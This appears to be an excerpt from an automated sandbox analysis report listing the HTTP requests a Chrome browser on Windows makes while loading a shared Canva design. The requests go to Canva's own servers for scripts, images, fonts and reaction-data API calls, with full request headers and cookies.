Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/22755d9a86c9/main.js? HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /_ajax/reaction/config/DAGXBQfQ3AM?documentExtension=BvO9V97vV3Qk87FqBY6pdQ HTTP/1.1Host: www.canva.comConnection: keep-aliveX-Canva-Brand: BAAAAAAAAAAX-Canva-App: design_viewersec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Canva-Build-Sha: 4aaacc3X-Canva-User: UAAAAAAAAAAX-Canva-Analytics: AAMAA1dFQgA=sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Canva-Request: getreactionconfigapisec-ch-ua-platform-version: "10.0.0"X-Canva-Locale: enX-Canva-Build-Name: 20241118-21sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
Source: global trafficHTTP traffic detected: GET /web/images/749002f5a04f784cc1802d77d2fed423.svg HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /static/images/favicon-1.ico HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /_ajax/reaction/reactions/summaries?parentArtifactType=DOCUMENT&source=B&reactedObjectType=B&limit=100&documentId=DAGXBQfQ3AM&documentExtension=BvO9V97vV3Qk87FqBY6pdQ HTTP/1.1Host: www.canva.comConnection: keep-aliveX-Canva-Brand: BAAAAAAAAAAX-Canva-App: design_viewersec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Canva-Build-Sha: 4aaacc3X-Canva-User: UAAAAAAAAAAX-Canva-Analytics: AAMAA1dFQgA=sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Canva-Request: findreactionsummaryapisec-ch-ua-platform-version: "10.0.0"X-Canva-Locale: enX-Canva-Build-Name: 20241118-21sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
Source: global trafficHTTP traffic detected: GET /web/images/9abc2241bf1479263a0a039f3d1e5b5c.svg HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/images/3e78ef31f2928a74c6d7ba19b91d0570.svg HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/images/3a05dbf1cdd156fcd1677a0b444cc36f.svg HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /chunk-batch/images/b46630e470f4040eba7033cf2435edce.woff HTTP/1.1Host: chunk-composing.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://chunk-composing.canva.com/chunk-batch/9791fb4bf6628247.ltr.css+5eb15c719412ac66.ltr.css+a1dc22ba8402ef3d.ltr.css+a0684b0780c739e9.vendor.ltr.css+ddcf8590ae7c901d.ltr.css+ca9cfd0af880d084.ltr.css+14a7f0159a2b69de.ltr.css+202e686830bf1e42.ltr.css+d8958d2938e6e8fe.ltr.css+bc2b400c76016a88.ltr.css+7fc1a90e4d75fcc9.ltr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_fb/s/41d36c36b634199c0ebf5e807fda38d0.css HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /chunk-batch/5756a030498f80f0.js+b3bc71e281d55f78.js HTTP/1.1Host: chunk-composing.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/images/cff149ee1e9d2be50ac77bcd86769d05.woff2 HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web/images/0483f2b648dcc986d01385062052ae1c.svg HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /static/images/favicon-1.ico HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/images/9abc2241bf1479263a0a039f3d1e5b5c.svg HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/images/749002f5a04f784cc1802d77d2fed423.svg HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /_ajax/reaction/reactions/summaries?parentArtifactType=DOCUMENT&source=B&reactedObjectType=B&limit=100&documentId=DAGXBQfQ3AM&documentExtension=BvO9V97vV3Qk87FqBY6pdQ HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
Source: global trafficHTTP traffic detected: GET /_ajax/reaction/config/DAGXBQfQ3AM?documentExtension=BvO9V97vV3Qk87FqBY6pdQ HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
Source: global trafficHTTP traffic detected: GET /chunk-batch/5756a030498f80f0.js+b3bc71e281d55f78.js HTTP/1.1Host: chunk-composing.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/images/8777e8ed572c4159d71b08cca2972b15.svg HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
Source: global trafficHTTP traffic detected: GET /web/images/aba10b640f15bb01b8e5f0b804eefc7f.svg HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; 